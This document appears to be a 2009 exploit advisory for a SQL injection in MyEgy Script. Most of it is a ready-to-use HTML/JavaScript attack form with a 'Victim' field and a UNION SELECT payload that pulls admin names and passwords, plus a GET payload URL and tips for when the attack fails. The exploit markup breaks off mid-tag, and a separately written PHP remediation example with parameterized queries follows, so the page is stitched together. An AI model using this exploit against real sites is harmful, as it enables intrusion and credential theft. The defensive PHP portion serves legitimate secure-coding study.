MyEgy Script suffers from a remote SQL injection vulnerability
Source: ahmed_sheko998[at]yahoo.com  Author: Sheko  Published: 2009-07-01

<html>
<!--
Script Name :MyEgy Script
Author : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email : K4rar@yahoo.com  ahmed_sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of myegy script have a different columns number so try to change the (Columns number) field
to 6 or 7 or 9 if the exploit failed with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
.style1 {
 text-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
 for(var n =1;n<co;n++){
 if(tmp){
 var tmp = tmp+n+",";
 }else{
 var tmp = n+",";

 }
tmp =tmp.replace(5,"concat(name,0x3a,password)");
document.f0.action=si+'/';
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
document.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi &amp; Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="
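
The page's note points at `$cat = $_REQUEST['c'];` as the source of the injectable value. The PHP below is an added example, not MyEgy's code and not the advisory authors': it shows `c` handled with an integer allow-list and a bound parameter. The `posts`/`cat_id`/`title` schema, the function name and the sample inputs are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the application's tables.
// "posts", "cat_id" and "title" are assumed names; the real schema is not on the page.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT)');
$db->exec("INSERT INTO posts (cat_id, title) VALUES (3, 'First post'), (3, 'Second post'), (4, 'Other')");

/**
 * Return the posts in one category, or null when the request value is not a
 * positive integer. The value never becomes part of the SQL text.
 * (Hypothetical helper written for this example.)
 */
function posts_in_category(PDO $db, $raw): ?array
{
    // Allow-list: a category id is a positive integer and nothing else.
    // Arrays (e.g. a "c[]" parameter) also fail this check and are rejected.
    $cat = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cat === false) {
        return null; // caller should answer 400 and log the rejected value
    }
    // Bound parameter: the driver receives the value separately from the statement.
    $stmt = $db->prepare('SELECT id, title FROM posts WHERE cat_id = :cat ORDER BY id');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed request values: one legitimate id, then non-integer shapes of
// input that must never reach the query.
$samples = ['3', '-1 union select 1,2', '3 or 1=1', ['3']];
foreach ($samples as $raw) {
    $rows = posts_in_category($db, $raw);
    printf("%-28s => %s\n", json_encode($raw), $rows === null ? 'rejected' : count($rows) . ' row(s)');
}
```

Reading the id from the single expected source (for example `$_GET`) instead of `$_REQUEST` also narrows the input to one channel; the page's second note relies on `$_REQUEST` accepting the parameter by GET as well as by the form's POST.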


     


 